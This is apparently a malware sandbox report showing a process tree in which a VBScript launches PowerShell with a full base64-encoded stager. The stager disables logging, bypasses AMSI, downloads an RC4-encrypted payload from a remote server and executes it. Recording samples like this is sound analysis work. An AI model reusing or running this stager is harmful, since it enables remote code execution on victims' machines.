| ZeroBOX

wscript.exe "C:\Windows\System32\wscript.exe" C:\Users\test22\AppData\Local\Temp\Accounts.vbs
3000
- powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noP -sta -w 1 -enc SQBmACgAJABQAFMAVgBFAHIAUwBpAG8ATgBUAGEAQgBMAGUALgBQAFMAVgBFAHIAUwBpAG8ATgAuAE0AYQBqAG8AUgAgAC0ARwBlACAAMwApAHsAJABDADYANwA9AFsAcgBFAEYAXQAuAEEAcwBTAGUATQBiAEwAWQAuAEcAZQBUAFQAWQBQAGUAKAAnAFMAeQBzAHQAZQBtAC4ATQBhAG4AYQBnAGUAbQBlAG4AdAAuAEEAdQB0AG8AbQBhAHQAaQBvAG4ALgBVAHQAaQBsAHMAJwApAC4AIgBHAEUAVABGAEkARQBgAEwAZAAiACgAJwBjAGEAYwBoAGUAZABHAHIAbwB1AHAAUABvAGwAaQBjAHkAUwBlAHQAdABpAG4AZwBzACcALAAnAE4AJwArACcAbwBuAFAAdQBiAGwAaQBjACwAUwB0AGEAdABpAGMAJwApADsASQBmACgAJABjADYANwApAHsAJAA2AGMANAA9ACQAYwA2ADcALgBHAGUAVABWAEEATAB1AEUAKAAkAG4AVQBMAGwAKQA7AEkAZgAoACQANgBjADQAWwAnAFMAYwByAGkAcAB0AEIAJwArACcAbABvAGMAawBMAG8AZwBnAGkAbgBnACcAXQApAHsAJAA2AEMANABbACcAUwBjAHIAaQBwAHQAQgAnACsAJwBsAG8AYwBrAEwAbwBnAGcAaQBuAGcAJwBdAFsAJwBFAG4AYQBiAGwAZQBTAGMAcgBpAHAAdABCACcAKwAnAGwAbwBjAGsATABvAGcAZwBpAG4AZwAnAF0APQAwADsAJAA2AGMANABbACcAUwBjAHIAaQBwAHQAQgAnACsAJwBsAG8AYwBrAEwAbwBnAGcAaQBuAGcAJwBdAFsAJwBFAG4AYQBiAGwAZQBTAGMAcgBpAHAAdABCAGwAbwBjAGsASQBuAHYAbwBjAGEAdABpAG8AbgBMAG8AZwBnAGkAbgBnACcAXQA9ADAAfQAkAFYAQQBsAD0AWwBDAE8AbABsAEUAYwB0AEkAbwBOAHMALgBHAGUAbgBFAFIASQBjAC4ARABJAEMAVABpAG8AbgBBAHIAWQBbAHMAVABSAGkATgBnACwAUwB5AFMAdABFAG0ALgBPAGIAagBlAGMAVABdAF0AOgA6AE4ARQB3ACgAKQA7ACQAdgBhAEwALgBBAGQAZAAoACcARQBuAGEAYgBsAGUAUwBjAHIAaQBwAHQAQgAnACsAJwBsAG8AYwBrAEwAbwBnAGcAaQBuAGcAJwAsADAAKQA7ACQAVgBhAEwALgBBAGQAZAAoACcARQBuAGEAYgBsAGUAUwBjAHIAaQBwAHQAQgBsAG8AYwBrAEkAbgB2AG8AYwBhAHQAaQBvAG4ATABvAGcAZwBpAG4AZwAnACwAMAApADsAJAA2AGMANABbACcASABLAEUAWQBfAEwATwBDAEEATABfAE0AQQBDAEgASQBOAEUAXABTAG8AZgB0AHcAYQByAGUAXABQAG8AbABpAGMAaQBlAHMAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAXABQAG8AdwBlAHIAUwBoAGUAbABsAFwAUwBjAHIAaQBwAHQAQgAnACsAJwBsAG8AYwBrAEwAbwBnAGcAaQBuAGcAJwBdAD0AJAB2AGEATAB9AEUAbABTAGUAewBbAFMAQwBSAEkAcABUAEIAbABvAGMASwBdAC4AIgBHAEUAVABGAEkARQBgAGwARAAiACgAJwBzAGkAZwBuAGEAdAB1AHIAZQBzACcALAAnAE4AJwArACcAbwBuAFAAdQBiAGwAaQBjACwAUwB0AGEAdABpAGMAJwApAC4AUwBlAHQAVgBhAEwAdQBFACgAJABOAFUAbABMACwAKABOAGUAdwAtAE8AQgBqAEUAYwB0ACAAQwBvAEwATABFAEMAdABpAE8AbgBTAC4ARwBFAG4AZQBSAGkAQwAuAEgAYQBTAEgAUwBFAHQAWwBzAFQAcgBpAG4ARwBdACkAKQB9ACQAUgBFAGYAPQBbAFIARQBmAF0ALgBBAHMAUwBFAG0AQgBMAFkALgBHAEUAdABUAFkAUABFACgAJwBTAHkAcwB0AGUAbQAuAE0AYQBuAGEAZwBlAG0AZQBuAHQALgBBAHUAdABvAG0AYQB0AGkAbwBuAC4AQQBtAHMAaQAnACsAJwBVAHQAaQBsAHMAJwApADsAJABSAEUARgAuAEcARQBUAEYASQBlAGwARAAoACcAYQBtAHMAaQBJAG4AaQB0AEYAJwArACcAYQBpAGwAZQBkACcALAAnAE4AbwBuAFAAdQBiAGwAaQBjACwAUwB0AGEAdABpAGMAJwApAC4AUwBlAFQAVgBBAEwAVQBFACgAJABuAHUAbABMACwAJAB0AFIAVQBFACkAOwB9ADsAWwBTAHkAUwBUAEUATQAuAE4ARQBUAC4AUwBlAFIAdgBpAEMARQBQAE8AaQBuAFQATQBBAG4AYQBHAEUAcgBdADoAOgBFAFgAcABlAGMAVAAxADAAMABDAE8ATgB0AGkATgBVAGUAPQAwADsAJABCAGEAMAA9AE4ARQB3AC0ATwBiAGoAZQBDAHQAIABTAHkAcwB0AGUAbQAuAE4ARQB0AC4AVwBFAEIAQwBMAEkAZQBOAFQAOwAkAHUAPQAnAE0AbwB6AGkAbABsAGEALwA1AC4AMAAgACgAVwBpAG4AZABvAHcAcwAgAE4AVAAgADYALgAxADsAIABXAE8AVwA2ADQAOwAgAFQAcgBpAGQAZQBuAHQALwA3AC4AMAA7ACAAcgB2ADoAMQAxAC4AMAApACAAbABpAGsAZQAgAEcAZQBjAGsAbwAnADsAJABzAGUAcgA9ACQAKABbAFQARQB4AFQALgBFAE4AQwBvAEQASQBOAGcAXQA6ADoAVQBuAEkAQwBvAGQAZQAuAEcARQB0AFMAVAByAEkATgBHACgAWwBDAE8ATgB2AGUAcgB0AF0AOgA6AEYAcgBvAE0AQgBhAHMAZQA2ADQAUwBUAFIAaQBOAGcAKAAnAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeABBAEQAawBBAE0AdwBBAHUAQQBEAEUAQQBNAFEAQQAzAEEAQwA0AEEATQBnAEEAdwBBAEQAZwBBAEwAZwBBAHgAQQBEAFEAQQBPAEEAQQA2AEEARABjAEEATwBBAEEAdwBBAEQAQQBBACcAKQApACkAOwAkAHQAPQAnAC8AbgBlAHcAcwAuAHAAaABwACcAOwAkAGIAQQAwAC4ASABlAEEARABlAFIAcwAuAEEARABEACgAJwBVAHMAZQByAC0AQQBnAGUAbgB0ACcALAAkAHUAKQA7ACQAQgBhADAALgBQAHIATwBYAHkAPQBbAFMAWQBTAFQARQBNAC4ATgBFAHQALgBXAEUAYgBSAEUAUQB1AGUAUwBUAF0AOgA6AEQAZQBmAGEAdQBMAHQAVwBlAEIAUAByAE8AeAB5ADsAJABiAGEAMAAuAFAAcgBvAFgAWQAuAEMAUgBlAGQARQBuAFQASQBBAGwAcwAgAD0AIABbAFMAeQBTAHQAZQBtAC4ATgBlAHQALgBDAHIAZQBEAGUAbgBUAEkAYQBsAEMAYQBDAGgARQBdADoAOgBEAGUAZgBhAFUATAB0AE4AZQBUAHcATwBSAEsAQwByAEUAZABFAG4AdABJAEEAbABTADsAJABTAGMAcgBpAHAAdAA6AFAAcgBvAHgAeQAgAD0AIAAkAGIAYQAwAC4AUAByAG8AeAB5ADsAJABLAD0AWwBTAHkAUwBUAGUAbQAuAFQARQBYAHQALgBFAE4AQwBvAEQASQBuAGcAXQA6ADoAQQBTAEMASQBJAC4ARwBlAFQAQgBZAHQARQBzACgAJwBkADQALAAwAGcAawBAAFsAUAAqACEALwBmAHMAdABhADoAYgA3AFEAQgBoAGwAVQBEAHIANgB4AEUAXQAzAF8AJwApADsAJABSAD0AewAkAEQALAAkAEsAPQAkAEEAUgBnAHMAOwAkAFMAPQAwAC4ALgAyADUANQA7ADAALgAuADIANQA1AHwAJQB7ACQASgA9ACgAJABKACsAJABTAFsAJABfAF0AKwAkAEsAWwAkAF8AJQAkAEsALgBDAE8AdQBuAFQAXQApACUAMgA1ADYAOwAkAFMAWwAkAF8AXQAsACQAUwBbACQASgBdAD0AJABTAFsAJABKAF0ALAAkAFMAWwAkAF8AXQB9ADsAJABEAHwAJQB7ACQASQA9ACgAJABJACsAMQApACUAMgA1ADYAOwAkAEgAPQAoACQASAArACQAUwBbACQASQBdACkAJQAyADUANgA7ACQAUwBbACQASQBdACwAJABTAFsAJABIAF0APQAkAFMAWwAkAEgAXQAsACQAUwBbACQASQBdADsAJABfAC0AQgB4AG8AcgAkAFMAWwAoACQAUwBbACQASQBdACsAJABTAFsAJABIAF0AKQAlADIANQA2AF0AfQB9ADsAJABiAGEAMAAuAEgAZQBhAEQARQByAHMALgBBAEQAZAAoACIAQwBvAG8AawBpAGUAIgAsACIAcQBHAFYAVABTAHkAPQBUAEoAWAB1AFgAVgBBAHUAZQBwADQAYgBuADcANABFAEwATwAzAFcAMgBUAEoAcABzAFIAZwA9ACIAKQA7ACQAZABhAHQAQQA9ACQAYgBhADAALgBEAE8AVwBOAGwAbwBBAGQARABBAFQAQQAoACQAUwBFAFIAKwAkAFQAKQA7ACQAaQBWAD0AJABEAEEAVABBAFsAMAAuAC4AMwBdADsAJABEAGEAVABBAD0AJABEAEEAVABBAFsANAAuAC4AJABEAEEAVABBAC4AbABlAG4AZwB0AEgAXQA7AC0ASgBvAEkATgBbAEMAaABBAFIAWwBdAF0AKAAmACAAJABSACAAJABkAEEAVABBACAAKAAkAEkAVgArACQASwApACkAfABJAEUAWAA=
  792

No process loaded Click on a process in the tree above to load its data.

PID
Parent PID

default registry file network process services synchronisation iexplore office pdf

Behavioral Analysis

Process tree

Process contents